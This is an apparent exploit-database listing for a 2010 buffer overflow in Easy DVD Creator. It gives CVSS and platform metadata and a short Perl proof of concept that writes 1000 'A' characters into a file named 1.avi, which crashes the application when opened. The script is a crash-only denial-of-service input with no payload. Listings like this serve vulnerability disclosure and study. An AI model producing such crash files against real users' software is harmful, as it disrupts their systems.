header-logo
Suggest Exploit
vendor:
Easy DVD Creator
by:
h1ch4m
7,8
CVSS
HIGH
Buffer Overflow
120
CWE
Product Name: Easy DVD Creator
Affected Version From: N/A
Affected Version To: N/A
Patch Exists: YES
Related CWE: N/A
CPE: N/A
Metasploit: N/A
Other Scripts: N/A
Tags: N/A
CVSS Metrics: N/A
Nuclei References: N/A
Nuclei Metadata: N/A
Platforms Tested: Windows XP SP3
2010

Easy DVD Creator Local Crash PoC

This exploit is a proof of concept for a buffer overflow vulnerability in Easy DVD Creator. The exploit creates a file with 1000 A characters and then starts the file, causing the application to crash.

Mitigation:

The vendor has released a patch to address this vulnerability.
Source

Exploit-DB raw data:

####
####
####Exploit Title: Easy DVD Creator Local Crash PoC
####Software Link: http://www.divxtodvd.net/dvd-creator.htm
####Tested on: Win XP SP3
####Date: 15-12-2010
####Author:  h1ch4m
####Email: h1ch4m@live.fr
####
####

my $file= "1.avi";
my $junk = "\x41" x 1000;
open($FILE,">$file");
print $FILE $junk;
close($FILE);
print "File Created successfully\n";
sleep(1);